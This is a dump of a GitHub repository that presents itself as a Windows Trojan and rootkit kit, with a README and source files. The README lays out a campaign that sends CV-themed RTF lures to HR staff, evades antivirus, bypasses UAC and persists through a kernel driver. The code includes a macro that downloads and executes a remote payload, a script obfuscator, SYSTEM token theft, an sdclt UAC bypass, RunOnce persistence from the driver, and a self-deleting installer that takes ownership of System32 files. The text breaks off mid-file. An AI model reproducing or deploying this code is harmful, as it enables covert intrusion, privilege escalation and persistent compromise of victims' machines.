├── Iris ├── README.md ├── pic │ ├── Cvrtf.png │ ├── Cvrtf2.png │ ├── RegistryLessPersistent.gif │ ├── out-11.gif │ └── out-6.gif └── src │ ├── Delivery │ ├── DemoPayLoad.vbs │ └── MsEncoder.vbs │ ├── Drv │ ├── Device.c │ ├── Device.h │ ├── Driver.c │ ├── Driver.h │ ├── Public.h │ ├── Queue.c │ ├── Queue.h │ └── Trace.h │ ├── Installer │ ├── Chkntfs │ │ ├── Chkntfs.cpp │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── Config │ │ ├── Config.c │ │ └── installer.c │ ├── README.md │ ├── RunOnce │ │ └── Program.cs │ ├── ds │ │ └── Program.cs │ ├── ns │ │ └── Program.cs │ └── tc32k │ │ └── Program.cs │ └── README.md └── README.md /Iris/README.md: -------------------------------------------------------------------------------- 1 | # Iris 2 | # Intoduction: throw the entire repository i assume that any APT vendor will have the necessary equipment to implement this sort of campaign. 3 | # Description 4 | Iris is an adjudicational Trojan & a fullon RootKit, Targeting windows machine's, maid for Research purposes
5 | And as a resource Kit for ethical hackers. 6 | we begin with delivery methods, anti-virus evastion and continue on to local acceleration of privileges in order to get a privileged persistent on the target machine. in this Repo we will try to simulate a full on root-kit throw hiding our persistence mechanism of action and simulating a real targeted campaign against any company or retailer. 7 | i do not supply any binary's for any of the Rat components, nither forge certificate's or native executable's. 8 | on the other hand i will try to give as much information as possible on how to avoid getting hit by this kind of exploit, and ll' try to supply as many open resources as possible to implement your own tool, for ethical hacking purposes, and for anti-virus software writers. 9 | # Tech 10 | # Packing: 11 | this specific Kit is implemented as such to simulate a targeted campaign against a retaler or a comapny assuming that the company use default office product's. becouse of that, our main delivery method for this kit is throw the office api, i implement the payload as an rtf document but this can easily be deployed to any other type of document (s.t, xls, .doc etc..). i implement this specific payload as it do not requere any former preperation on the client side, and it is not recognized as a malware by the google mail (afaik), or most modern Av products. 12 | in addition i will say that getting a Cv for a job application in the form of an rtf is an everyday harmless way to pack your payload, and any un-paranoid HR-person will likely to open the given document, in addition the mail display is not implemented on rtf as to .pdf documents in many browsers and mail providers, so its a good enough reason to download the document and to view it on the local machine.
13 | The .rtf itself contains a .vbe payload that will force winword.exe to download an encrypted zip folder that contains our installer & the native drivers.
14 | after download the script calls the decryptor with the decryption key and that executable extract's the intallation files to the target machine (in a writable location) to infect the target machine. 15 | # Spec: view delivery section under the /src directory. 16 | # Installer: 17 | The first thing Our installer do is to bypass uac throw registry hijacking to trigger another executable that duplicates the system token and allows as to manipulate the target as NT Authority\System. in this kit we only utilize a uac bypass assuming that the target user is a member of the administative group, but we can easly exchange this mechanism of action to another LPE to support all test cases. see my "JailBreaks" repo for that.
18 | for Persistance on the target machine and to hide our activity we install a native driver that we will cover in the next sections and make some necessary changes to the target machine. all our payload files are places in the SysWow64 directory as to hide your activity (that targets specific x64 windows machine's) and to support most .NET components of the payload. as will be explained later on.
19 | after the installer is done it will kindly delete himself from the target machine and all other installation media to hide from debuggers and Av scanners. in addition throw the entire process i try to use as many native Windows API's as possible to avoid vertioning problems and Av detection at any phase of the rat action.
20 | Meaning that technically i load the driver with sc.exe i load my payload with sdclt and try to use as many native loaders to avoid detection & unnecessary and complex digital signiture's forgary or user interactions.
21 | In adition an important part of our persistent on the target machine is to hide our own activity, for that we try to avoid registry manipulation as far as possible and we use native API's to add exception's to our backdoors and C&C implementations. as to leave as little as possible sign's of our existance on the target machine. 22 | 23 | # Av evasion 24 | any modern anti-virus software makes use of the "reputational method" meaning that evan if your payload is succesfully signed by a root spc authorety it doesn't necessarily mean that the target machine will execute the given payload simply because the reputation of your software is not recognized by the Av users compunity and as such may be blocked by any Respectfull Av campaign. becouse of that we target two native's WinWord that is white listed to execute nay vbscript (i will explain why i use this native and not powershell). and WScript engauine to execute our Eop, after Eop we have the necessary permissions to execute any given software w/o any Av interference. 25 | 26 | # There Are Two Options to Execute your payload and bypass all Av software. (afaik)... 27 | One -> Execute an rtf working under winword.
28 | Second -> Execute a sign VBE (simply because a script do not hold reputation, so open file will not block your application due to signature and the Av will not recognize a bad reputation simply cuz this is a vbe...). 29 | i will point out that if you are working under windows 10 build 14 and lower, there exist a possibility of packing your payload inside a signed .cab file (for open file warnings), or simply using .hta application that (for some reason), on that older win builds do not suffer the open file or Av detection at any given time, but in this Repo we utilize the .rtf described above. 30 | 31 | # Persistance & Avoiding detection. 32 | one thing we really dont want to do is to place Registry keys for Our persistence. because of that (and to gain the possibility to inject our C&C to native applications) we install a native driver and load it as an auto load driver that means that evan if the user will not sign into the machine it will be loaded placing registry entry's under RunOnce that will be automaticlly erased after logon. that way we do not leave any registry keys pointing out to our C&C.
33 | In addition the driver can reinstall the software if the user removes the installation components, meaning that only a format can clean the infected machine.
34 | In addition our installer place the entire C&C media inside the system directory's for further evading detection. Another mechanism that we implement to achive yet another persistent method is to erase the native Runonce executable so we can make the driver load any registry entry's under runonce and our native will be called instead of the native application loading our payload everytime the user logs into the local installation. Redundant to say the tyhe driver will be loaded evan if using safe-boot, and our entire installation media is replacing the native operating system components so such a "safe-boot" recovery is not an option for removing the Rat. 35 | # Addendum 36 | The source code is given asw is without any warranty you can copy redistribute and you do not have to point to this repository while you do so, this repository was made for educational purposes, i will not help anyone to compile the given code or to test it at any case i will answer Q about this project in my mail box that is referanced in my profile details. i hope you the reader will make good use of this repository and i am open to any further suggestions or questions about it. 37 | In addition i will try to detail every step of making the software inside the given code sections of each individual component. 38 | # Building The Executables 39 | you will need WDK, VS 2015 & VS 2017. 40 | 41 | # Tested On Latest Windows and office & against the latest anti-virus software & email delivery retailers, and to the date given: 42 | # 1/8/2017 43 | # Notes: This Rat Do not support smart firewall campaigns and as such do not utilize any UDP packets to the root c&c server. 44 | # Proof Of Concept 45 | 46 | # Delivery 47 | ![](pic/out-11.gif) 48 | 49 | # Av 50 | # No threats detected & No FireWall Block or user interactions. 51 | ![](pic/Cvrtf.png) 52 | ![](pic/Cvrtf2.png) 53 | 54 | # Persistence 55 | # No Registry 56 | 57 | ![](pic/RegistryLessPersistent.gif) 58 | 59 | # Not Operating From User Land & and the user don't need to be the domain admin. 60 | 61 | ![](pic/out-6.gif) 62 | 63 | -------------------------------------------------------------------------------- /Iris/pic/Cvrtf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/Cvrtf.png -------------------------------------------------------------------------------- /Iris/pic/Cvrtf2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/Cvrtf2.png -------------------------------------------------------------------------------- /Iris/pic/RegistryLessPersistent.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/RegistryLessPersistent.gif -------------------------------------------------------------------------------- /Iris/pic/out-11.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/out-11.gif -------------------------------------------------------------------------------- /Iris/pic/out-6.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SarinI0/Rats/581aa50d177aa536910ef729dd33af43890b861c/Iris/pic/out-6.gif -------------------------------------------------------------------------------- /Iris/src/Delivery/DemoPayLoad.vbs: -------------------------------------------------------------------------------- 1 | ;Encode this script & Save it as Cv.rtf WinWord will do the job for you. 2 | 3 | Sub Auto_Open() 4 | HTTPDownload "http://zippedpayload", "C:\Users\Public\Documents\P.zip" 5 | Execute 6 | 7 | End Sub 8 | 9 | Public Function HTTPDownload(myURL, myPath) 10 | Dim i, objFile, objFSO, objHTTP, strFile, strMsg 11 | Const ForReading = 1, ForWriting = 2, ForAppending = 8 12 | Set objFSO = CreateObject("Scripting.FileSystemObject") 13 | If objFSO.FolderExists(myPath) Then 14 | strFile = objFSO.BuildPath(myPath, Mid(myURL, InStrRev(myURL, "/") + 1)) 15 | ElseIf objFSO.FolderExists(Left(myPath, InStrRev(myPath, "\") - 1)) Then 16 | strFile = myPath 17 | End If 18 | Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True) 19 | Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") 20 | objHTTP.Open "GET", myURL, False 21 | objHTTP.Send 22 | For i = 1 To LenB(objHTTP.ResponseBody) 23 | objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1))) 24 | Next 25 | 26 | End Function 27 | 28 | Public Function Execute() As Variant 29 | Dim args, num, ex, dr 30 | Dim var1, var2 31 | Dim objFSO, objFolder 32 | Dim objStream 33 | Dim objSha 34 | Dim WshShell 35 | Dim objSh 36 | Dim strFolder, strURL, strFile, strFull 37 | Dim strUnat, strCmdLine, strDmdLine 38 | ex = "cscript.exe C:\Users\Public\Documents\P\Payload.exe" 39 | Set WshShell = CreateObject("WScript.Shell") 40 | ZipFile = "C:\Users\Public\Documents\P.zip" 41 | ExtractTo = "C:\Users\Public\Documents\P" 42 | Set fso = CreateObject("Scripting.FileSystemObject") 43 | If Not fso.FolderExists(ExtractTo) Then 44 | fso.CreateFolder (ExtractTo) 45 | End If 46 | Set objShell = CreateObject("Shell.Application") 47 | Set FilesInZip = objShell.Namespace(ZipFile).items 48 | objShell.Namespace(ExtractTo).CopyHere (FilesInZip) 49 | Set fso = Nothing 50 | Set objShell = Nothing 51 | Set objSha = CreateObject("shell.application") 52 | objSha.ShellExecute "C:\Users\Public\Documents\P\Payload.exe", "Arguments", "C:\Users\Public\Documents\P\", "open", 1 ;etc 53 | End Function 54 | -------------------------------------------------------------------------------- /Iris/src/Delivery/MsEncoder.vbs: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | 3 | dim oEncoder, oFilesToEncode, file, sDest 4 | dim sFileOut, oFile, oEncFile, oFSO, i 5 | dim oStream, sSourceFile 6 | 7 | set oFilesToEncode = WScript.Arguments 8 | set oEncoder = CreateObject("Scripting.Encoder") 9 | For i = 0 to oFilesToEncode.Count - 1 10 | set oFSO = CreateObject("Scripting.FileSystemObject") 11 | file = oFilesToEncode(i) 12 | set oFile = oFSO.GetFile(file) 13 | Set oStream = oFile.OpenAsTextStream(1) 14 | sSourceFile=oStream.ReadAll 15 | oStream.Close 16 | sDest = oEncoder.EncodeScriptFile(".vbs",sSourceFile,0,"") 17 | sFileOut = Left(file, Len(file) - 3) & "vbe" 18 | Set oEncFile = oFSO.CreateTextFile(sFileOut) 19 | oEncFile.Write sDest 20 | oEncFile.Close 21 | Next 22 | 23 | -------------------------------------------------------------------------------- /Iris/src/Drv/Device.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include "driver.h" 4 | #include "device.tmh" 5 | 6 | #ifdef ALLOC_PRAGMA 7 | #pragma alloc_text (PAGE, ds64bCreateDevice) 8 | #endif 9 | 10 | NTSTATUS 11 | ds64bCreateDevice( 12 | _Inout_ PWDFDEVICE_INIT DeviceInit 13 | ) 14 | 15 | { 16 | WDF_OBJECT_ATTRIBUTES deviceAttributes; 17 | PDEVICE_CONTEXT deviceContext; 18 | WDFDEVICE device; 19 | NTSTATUS status; 20 | 21 | PAGED_CODE(); 22 | 23 | WDF_OBJECT_ATTRIBUTES_INIT_CONTEXT_TYPE(&deviceAttributes, DEVICE_CONTEXT); 24 | 25 | status = WdfDeviceCreate(&DeviceInit, &deviceAttributes, &device); 26 | 27 | if (NT_SUCCESS(status)) { 28 | 29 | deviceContext = DeviceGetContext(device); 30 | 31 | deviceContext->PrivateDeviceData = 0; 32 | 33 | 34 | status = WdfDeviceCreateDeviceInterface( 35 | device, 36 | &GUID_DEVINTERFACE_ds64b, 37 | NULL 38 | ); 39 | 40 | if (NT_SUCCESS(status)) { 41 | status = ds64bQueueInitialize(device); 42 | } 43 | } 44 | 45 | return status; 46 | } 47 | -------------------------------------------------------------------------------- /Iris/src/Drv/Device.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include "public.h" 4 | 5 | EXTERN_C_START 6 | 7 | 8 | typedef struct _DEVICE_CONTEXT 9 | { 10 | ULONG PrivateDeviceData; 11 | 12 | } DEVICE_CONTEXT, *PDEVICE_CONTEXT; 13 | 14 | 15 | WDF_DECLARE_CONTEXT_TYPE_WITH_NAME(DEVICE_CONTEXT, DeviceGetContext) 16 | 17 | 18 | NTSTATUS 19 | ds64bCreateDevice( 20 | _Inout_ PWDFDEVICE_INIT DeviceInit 21 | ); 22 | 23 | EXTERN_C_END 24 | -------------------------------------------------------------------------------- /Iris/src/Drv/Driver.c: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "driver.h" 3 | #include "driver.tmh" 4 | 5 | #ifdef ALLOC_PRAGMA 6 | #pragma alloc_text (INIT, DriverEntry) 7 | #endif 8 | 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | #pragma comment(lib, "NtosKrnl.lib") 15 | #pragma comment(lib, "Ntdll.lib") 16 | 17 | VOID 18 | Persistent( 19 | _In_ LPWSTR ld, 20 | _In_ LPWSTR lv, 21 | _In_ LPWSTR ln 22 | ) 23 | { 24 | UNICODE_STRING Ro; 25 | UNICODE_STRING Re; 26 | OBJECT_ATTRIBUTES obj; 27 | HANDLE hKey; 28 | 29 | RtlInitUnicodeString(&Ro, ld); 30 | 31 | obj.Length = sizeof(OBJECT_ATTRIBUTES); 32 | obj.RootDirectory = NULL; 33 | obj.ObjectName = &Ro; 34 | obj.SecurityDescriptor = NULL; 35 | obj.SecurityQualityOfService = NULL; 36 | obj.Attributes = OBJ_CASE_INSENSITIVE; 37 | 38 | char buff[256] = { 0 }; 39 | ZwCreateKey( 40 | &hKey, 41 | GENERIC_ALL, 42 | &obj, 43 | 0, 44 | NULL, 45 | 0, 46 | NULL 47 | ); 48 | 49 | LPWSTR lDat = lv; 50 | RtlInitUnicodeString(&Re, ln); 51 | ZwSetValueKey(hKey, &Re, 0, REG_SZ, lDat, wcslen(lDat) * sizeof(wchar_t)); 52 | ZwClose(hKey); 53 | } 54 | 55 | NTSTATUS 56 | DriverEntry( 57 | _In_ PDRIVER_OBJECT DriverObject, 58 | _In_ PUNICODE_STRING RegistryPath 59 | ) 60 | { 61 | LPWSTR ld0 = L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"; 62 | LPWSTR lv0 = // you can place anything here. 63 | LPWSTR ln0 = // you can place anything here. 64 | LPWSTR lv1 = // you can place anything here. 65 | LPWSTR ln1 = // you can place anything here. 66 | Persistent( 67 | ld0, 68 | lv0, 69 | ln0 70 | ); 71 | Persistent( 72 | ld0, 73 | lv1, 74 | ln1 75 | ); 76 | return STATUS_SUCCESS; 77 | } 78 | -------------------------------------------------------------------------------- /Iris/src/Drv/Driver.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #include "device.h" 8 | #include "queue.h" 9 | #include "trace.h" 10 | 11 | EXTERN_C_START 12 | 13 | 14 | DRIVER_INITIALIZE DriverEntry; 15 | EVT_WDF_DRIVER_DEVICE_ADD ds64bEvtDeviceAdd; 16 | EVT_WDF_OBJECT_CONTEXT_CLEANUP ds64bEvtDriverContextCleanup; 17 | 18 | EXTERN_C_END 19 | -------------------------------------------------------------------------------- /Iris/src/Drv/Public.h: -------------------------------------------------------------------------------- 1 | 2 | DEFINE_GUID (GUID_DEVINTERFACE_ds64b, 3 | 0x53a16c7d,0x6a24,0x4ad4,0xa3,0xb6,0xde,0x00,0x31,0x6f,0x18,0xde); 4 | 5 | -------------------------------------------------------------------------------- /Iris/src/Drv/Queue.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include "driver.h" 4 | #include "queue.tmh" 5 | 6 | #ifdef ALLOC_PRAGMA 7 | #pragma alloc_text (PAGE, ds64bQueueInitialize) 8 | #endif 9 | 10 | NTSTATUS 11 | ds64bQueueInitialize( 12 | _In_ WDFDEVICE Device 13 | ) 14 | 15 | { 16 | WDFQUEUE queue; 17 | NTSTATUS status; 18 | WDF_IO_QUEUE_CONFIG queueConfig; 19 | 20 | PAGED_CODE(); 21 | 22 | WDF_IO_QUEUE_CONFIG_INIT_DEFAULT_QUEUE( 23 | &queueConfig, 24 | WdfIoQueueDispatchParallel 25 | ); 26 | 27 | queueConfig.EvtIoDeviceControl = ds64bEvtIoDeviceControl; 28 | queueConfig.EvtIoStop = ds64bEvtIoStop; 29 | 30 | status = WdfIoQueueCreate( 31 | Device, 32 | &queueConfig, 33 | WDF_NO_OBJECT_ATTRIBUTES, 34 | &queue 35 | ); 36 | 37 | if(!NT_SUCCESS(status)) { 38 | TraceEvents(TRACE_LEVEL_ERROR, TRACE_QUEUE, "WdfIoQueueCreate failed %!STATUS!", status); 39 | return status; 40 | } 41 | 42 | return status; 43 | } 44 | 45 | VOID 46 | ds64bEvtIoDeviceControl( 47 | _In_ WDFQUEUE Queue, 48 | _In_ WDFREQUEST Request, 49 | _In_ size_t OutputBufferLength, 50 | _In_ size_t InputBufferLength, 51 | _In_ ULONG IoControlCode 52 | ) 53 | 54 | { 55 | TraceEvents(TRACE_LEVEL_INFORMATION, 56 | TRACE_QUEUE, 57 | "%!FUNC! Queue 0x%p, Request 0x%p OutputBufferLength %d InputBufferLength %d IoControlCode %d", 58 | Queue, Request, (int) OutputBufferLength, (int) InputBufferLength, IoControlCode); 59 | 60 | WdfRequestComplete(Request, STATUS_SUCCESS); 61 | 62 | return; 63 | } 64 | 65 | VOID 66 | ds64bEvtIoStop( 67 | _In_ WDFQUEUE Queue, 68 | _In_ WDFREQUEST Request, 69 | _In_ ULONG ActionFlags 70 | ) 71 | 72 | { 73 | TraceEvents(TRACE_LEVEL_INFORMATION, 74 | TRACE_QUEUE, 75 | "%!FUNC! Queue 0x%p, Request 0x%p ActionFlags %d", 76 | Queue, Request, ActionFlags); 77 | 78 | 79 | return; 80 | } 81 | -------------------------------------------------------------------------------- /Iris/src/Drv/Queue.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | EXTERN_C_START 4 | 5 | typedef struct _QUEUE_CONTEXT { 6 | 7 | ULONG PrivateDeviceData; 8 | 9 | } QUEUE_CONTEXT, *PQUEUE_CONTEXT; 10 | 11 | WDF_DECLARE_CONTEXT_TYPE_WITH_NAME(QUEUE_CONTEXT, QueueGetContext) 12 | 13 | NTSTATUS 14 | ds64bQueueInitialize( 15 | _In_ WDFDEVICE Device 16 | ); 17 | EVT_WDF_IO_QUEUE_IO_DEVICE_CONTROL ds64bEvtIoDeviceControl; 18 | EVT_WDF_IO_QUEUE_IO_STOP ds64bEvtIoStop; 19 | 20 | EXTERN_C_END 21 | -------------------------------------------------------------------------------- /Iris/src/Drv/Trace.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #define WPP_CONTROL_GUIDS \ 4 | WPP_DEFINE_CONTROL_GUID( \ 5 | ds64bTraceGuid, (05e1ca77,5869,4c19,aee8,d735147e9974), \ 6 | \ 7 | WPP_DEFINE_BIT(MYDRIVER_ALL_INFO) \ 8 | WPP_DEFINE_BIT(TRACE_DRIVER) \ 9 | WPP_DEFINE_BIT(TRACE_DEVICE) \ 10 | WPP_DEFINE_BIT(TRACE_QUEUE) \ 11 | ) 12 | 13 | #define WPP_FLAG_LEVEL_LOGGER(flag, level) \ 14 | WPP_LEVEL_LOGGER(flag) 15 | 16 | #define WPP_FLAG_LEVEL_ENABLED(flag, level) \ 17 | (WPP_LEVEL_ENABLED(flag) && \ 18 | WPP_CONTROL(WPP_BIT_ ## flag).Level >= level) 19 | 20 | #define WPP_LEVEL_FLAGS_LOGGER(lvl,flags) \ 21 | WPP_LEVEL_LOGGER(flags) 22 | 23 | #define WPP_LEVEL_FLAGS_ENABLED(lvl, flags) \ 24 | (WPP_LEVEL_ENABLED(flags) && WPP_CONTROL(WPP_BIT_ ## flags).Level >= lvl) 25 | 26 | 27 | #define WPP_RECORDER_FLAGS_LEVEL_ARGS(flags, lvl) WPP_RECORDER_LEVEL_FLAGS_ARGS(lvl, flags) 28 | #define WPP_RECORDER_FLAGS_LEVEL_FILTER(flags, lvl) WPP_RECORDER_LEVEL_FLAGS_FILTER(lvl, flags) 29 | 30 | -------------------------------------------------------------------------------- /Iris/src/Installer/Chkntfs/Chkntfs.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include 3 | 4 | #pragma comment(lib, "wtsapi32") 5 | #pragma comment(linker,"/SUBSYSTEM:windows /ENTRY:mainCRTStartup") 6 | 7 | BOOL IsSystemSid(PSID sid) { 8 | return ::IsWellKnownSid(sid, WinLocalSystemSid); 9 | } 10 | 11 | HANDLE OpenSystemProcessToken() { 12 | PWTS_PROCESS_INFO pInfo; 13 | DWORD count; 14 | if (!::WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pInfo, &count)) { 15 | return nullptr; 16 | } 17 | 18 | HANDLE hToken{}; 19 | for (DWORD i = 0; i < count && !hToken; i++) { 20 | if (pInfo[i].SessionId == 0 && IsSystemSid(pInfo[i].pUserSid)) { 21 | auto hProcess = ::OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pInfo[i].ProcessId); 22 | if (hProcess) { 23 | ::OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_IMPERSONATE, &hToken); 24 | ::CloseHandle(hProcess); 25 | } 26 | } 27 | } 28 | 29 | ::WTSFreeMemory(pInfo); 30 | return hToken; 31 | } 32 | 33 | BOOL SetPrivilege(HANDLE hToken, PCTSTR lpszPrivilege, bool bEnablePrivilege) { 34 | TOKEN_PRIVILEGES tp; 35 | LUID luid; 36 | 37 | if (!::LookupPrivilegeValue(nullptr, lpszPrivilege, &luid)) 38 | return FALSE; 39 | 40 | tp.PrivilegeCount = 1; 41 | tp.Privileges[0].Luid = luid; 42 | if (bEnablePrivilege) 43 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 44 | else 45 | tp.Privileges[0].Attributes = 0; 46 | 47 | if (!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr)) { 48 | return FALSE; 49 | } 50 | 51 | if (::GetLastError() == ERROR_NOT_ALL_ASSIGNED) 52 | return FALSE; 53 | 54 | return TRUE; 55 | } 56 | 57 | LPWSTR ConvertToLPWSTR(const std::string& s) 58 | { 59 | LPWSTR ws = new wchar_t[s.size() + 1]; 60 | copy(s.begin(), s.end(), ws); 61 | ws[s.size()] = 0; 62 | return ws; 63 | } 64 | 65 | BOOL EnableDebugPrivilege(void) { 66 | HANDLE hToken; 67 | BOOL result; 68 | if (!::OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { 69 | return FALSE; 70 | } 71 | result = SetPrivilege(hToken, SE_DEBUG_NAME, TRUE); 72 | ::CloseHandle(hToken); 73 | return result; 74 | } 75 | 76 | int InQuota(LPWSTR Su, LPCTSTR P) { 77 | 78 | if (FALSE == EnableDebugPrivilege()) { 79 | return 1; 80 | } 81 | 82 | auto hToken = OpenSystemProcessToken(); 83 | if (!hToken) { 84 | return 1; 85 | } 86 | 87 | HANDLE hDupToken, hPrimary; 88 | ::DuplicateTokenEx(hToken, TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_PRIVILEGES, 89 | nullptr, SecurityImpersonation, TokenImpersonation, &hDupToken); 90 | ::DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenPrimary, &hPrimary); 91 | ::CloseHandle(hToken); 92 | 93 | if (hDupToken == nullptr) { 94 | return 1; 95 | } 96 | 97 | STARTUPINFO si = { sizeof(si) }; 98 | si.lpDesktop = L"Winsta0\\default"; 99 | 100 | PROCESS_INFORMATION pi; 101 | 102 | BOOL impersonated = ::SetThreadToken(nullptr, hDupToken); 103 | assert(impersonated); 104 | if (!impersonated) { 105 | return 1; 106 | } 107 | 108 | HANDLE hCurrentToken; 109 | DWORD session = 0, len = sizeof(session); 110 | ::OpenProcessToken(::GetCurrentProcess(), TOKEN_ALL_ACCESS, &hCurrentToken); 111 | ::GetTokenInformation(hCurrentToken, TokenSessionId, &session, len, &len); 112 | ::CloseHandle(hCurrentToken); 113 | 114 | if (!SetPrivilege(hDupToken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE) || 115 | !SetPrivilege(hDupToken, SE_INCREASE_QUOTA_NAME, TRUE)) { 116 | return 1; 117 | } 118 | 119 | BOOL ok = ::SetTokenInformation(hPrimary, TokenSessionId, &session, sizeof(session)); 120 | 121 | ::CreateProcessAsUser(hPrimary, nullptr, Su, nullptr, nullptr, FALSE, 0, nullptr, P, &si, &pi); 122 | 123 | return 0; 124 | } 125 | 126 | VOID main(int argc, char* argv[]) { 127 | using namespace std; 128 | string MemExe = (string)argv[0]; 129 | string Ptr = ""; 130 | string pa = ""; 131 | string Wp = ""; 132 | auto Wpr = nullptr; 133 | for (int j = 0; j < MemExe.length() - 12; j++) { 134 | if (MemExe[j] == *"\\") { 135 | Ptr += "\\"; 136 | pa += "\\"; 137 | Wp += "\\"; 138 | } 139 | Wp += MemExe[j]; 140 | Ptr += MemExe[j]; 141 | pa += MemExe[j]; 142 | } 143 | Ptr += "\\"; pa += "\\"; 144 | Ptr += "\\"; pa += "\\"; 145 | Ptr += "CMake.exe"; pa += "installer.exe"; 146 | LPWSTR Cl0 = ConvertToLPWSTR(Ptr); 147 | LPWSTR Cl1 = ConvertToLPWSTR(pa); 148 | auto h = InQuota(Cl0, nullptr); 149 | auto i = InQuota(Cl1, ConvertToLPWSTR(Wp)); 150 | 151 | } 152 | -------------------------------------------------------------------------------- /Iris/src/Installer/Chkntfs/stdafx.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "stdafx.h" 3 | 4 | -------------------------------------------------------------------------------- /Iris/src/Installer/Chkntfs/stdafx.h: -------------------------------------------------------------------------------- 1 | 2 | #pragma once 3 | 4 | #include "targetver.h" 5 | 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | 36 | #ifdef _DEBUG 37 | #undef free 38 | #define free(p) _free_dbg(p, _NORMAL_BLOCK); *(int*)&p = 0x666; 39 | #endif 40 | 41 | #ifndef _DEBUG_ONE 42 | #pragma comment(lib, "advapi32.lib") 43 | #pragma comment(lib, "Kernel32.lib") 44 | #pragma comment(lib, "opengl32.lib") 45 | #pragma comment(lib, "comctl32.lib") 46 | #pragma comment(lib,"Wtsapi32.lib") 47 | #pragma comment(lib,"RpcRT4.lib") 48 | #endif 49 | 50 | #define IDR_RUNDLL32_DLL1 101 51 | 52 | #ifdef APSTUDIO_INVOKED 53 | #ifndef APSTUDIO_READONLY_SYMBOLS 54 | #define _APS_NEXT_RESOURCE_VALUE 102 55 | #define _APS_NEXT_COMMAND_VALUE 40001 56 | #define _APS_NEXT_CONTROL_VALUE 1001 57 | #define _APS_NEXT_SYMED_VALUE 101 58 | #include 59 | #pragma comment(lib, "shlwapi.lib") 60 | #endif 61 | #endif 62 | 63 | #include 64 | #include 65 | 66 | 67 | typedef int(*FUNKY_POINTER)(void); 68 | 69 | #include 70 | 71 | #define _WIN32_WINNT_WIN10_TH2 _WIN32_WINNT_WIN10 72 | #define _WIN32_WINNT_WIN10_RS1 _WIN32_WINNT_WIN10 73 | 74 | #ifdef _UNICODE 75 | typedef wchar_t TCHAR; 76 | #else 77 | typedef char TCHAR; 78 | #endif 79 | typedef const TCHAR* LPCTSTR; 80 | 81 | #ifndef _WIN32_WINNT 82 | #define _WIN32_WINNT 0x0600 83 | #endif 84 | 85 | using std::string; 86 | using namespace std; 87 | 88 | -------------------------------------------------------------------------------- /Iris/src/Installer/Chkntfs/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | -------------------------------------------------------------------------------- /Iris/src/Installer/Config/Config.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | system("c:\\Windows\\System32\\sdclt.exe /kickoffelev"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /Iris/src/Installer/Config/installer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #define _WIN32_WINNT 0x0500 4 | #include 5 | #include 6 | #pragma comment(lib, "kernel32.lib") 7 | #pragma comment(lib, "User32.lib") 8 | #define SRS TEXT("cmd.exe /C ping 1.1.1.1 -n -w 3000 > nul & del \"%s\"") 9 | 10 | void kamikaza(){ 11 | TCHAR szModuleName[MAX_PATH]; 12 | TCHAR szCmd[2 * MAX_PATH]; 13 | STARTUPINFO si = {0}; 14 | PROCESS_INFORMATION pi = {0}; 15 | GetModuleFileName(NULL, szModuleName, MAX_PATH); 16 | StringCbPrintf(szCmd, 2 * MAX_PATH, SRS, szModuleName); 17 | CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); 18 | CloseHandle(pi.hThread); 19 | CloseHandle(pi.hProcess); 20 | } 21 | 22 | void main(){ 23 | HWND hWnd = GetConsoleWindow(); 24 | ShowWindow( hWnd , SW_MINIMIZE ); 25 | ShowWindow( hWnd, SW_HIDE ); 26 | for(int q=0;q<1000000;q++){} 27 | system("takeown /F C:\\Windows\\System32\\Configuration"); 28 | system("icacls C:\\Windows\\System32\\Configuration /grant administrators:F"); 29 | system("takeown /F 